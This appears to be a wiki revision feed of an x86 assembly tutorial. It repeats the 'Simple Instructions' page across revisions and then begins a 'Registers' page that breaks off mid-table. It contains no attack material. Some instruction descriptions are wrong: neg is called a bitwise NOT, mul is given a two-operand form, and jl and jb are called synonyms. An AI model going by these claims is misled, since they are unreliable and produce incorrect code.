because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax -- eax = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax stores an array of 16-bit (2 byte) <br />
values, and that ebx is an offset into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and neg does a bitwise negation.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
neg eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the 64-bit register edx:eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the result in the 64-bit pointer edx:eax. ''imul'' does the same thing, except the value is signed. Here are some examples of mul:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
When used with two parameters, ''mul'' instead multiplies the first by the second as expected:<br />
mul ecx, 10h ; ecx = ecx * 0x10 (unsigned)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert double to quad." In other words, convert the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operations: the register to use, and the number of places to shift the value in the register. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the executable instruction onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the first value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address which usually crashes the program. In some cases, it may jump to the wrong place where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack immediately after ret executes its jump. This addition allows the function to remove values that were pushed onto the stack. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' are used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares two operands and sets or unsets flags in the [[Registers#flags|flags]] register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two operands. ''test'' is most commonly used to compare a variable to itself to check if it's zero.<br />
<br />
=== jz/je, jnz/jne, jl/jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' and ''jb'' (which are synonyms) jumps if the first parameter is less than the second. <br />
* ''jg'' jumps if the first parameter is greater than the second. <br />
* ''jle'' jumps if the 'less than' or the 'zero' flag is set, so "less than or equal to". <br />
* ''jge'' jumps if the first is "greater than or equal to" the second.<br />
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Functions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Wont this just loop forever because ecx is never incremented? Total noob here so i may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 comp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, The stack is decremented when pushed, but increased when poped? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3139Simple Instructions2012-01-16T00:52:20Z<p>Killboy: /* cmp, test */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the functions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is comprised of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov [ebx], 3 ; move the number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing'', it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax -- eax = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax stores an array of 16-bit (2 byte) <br />
values, and that ebx is an offset into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and neg does a bitwise negation.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
neg eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the 64-bit register edx:eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the result in the 64-bit pointer edx:eax. ''imul'' does the same thing, except the value is signed. Here are some examples of mul:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
When used with two parameters, ''mul'' instead multiplies the first by the second as expected:<br />
mul ecx, 10h ; ecx = ecx * 0x10 (unsigned)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert double to quad." In other words, convert the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operations: the register to use, and the number of places to shift the value in the register. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the executable instruction onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the first value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address which usually crashes the program. In some cases, it may jump to the wrong place where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack immediately after ret executes its jump. This addition allows the function to remove values that were pushed onto the stack. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' are used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares two operands and sets or unsets flags in the 'flags' register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two operands. ''test'' is most commonly used to compare a variable to itself to check if it's zero.<br />
<br />
=== jz/je, jnz/jne, jl/jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' and ''jb'' (which are synonyms) jumps if the first parameter is less than the second. <br />
* ''jg'' jumps if the first parameter is greater than the second. <br />
* ''jle'' jumps if the 'less than' or the 'zero' flag is set, so "less than or equal to". <br />
* ''jge'' jumps if the first is "greater than or equal to" the second.<br />
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Functions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Wont this just loop forever because ecx is never incremented? Total noob here so i may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 comp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, The stack is decremented when pushed, but increased when poped? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3138Registers2012-01-16T00:44:54Z<p>Killboy: /* flags */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
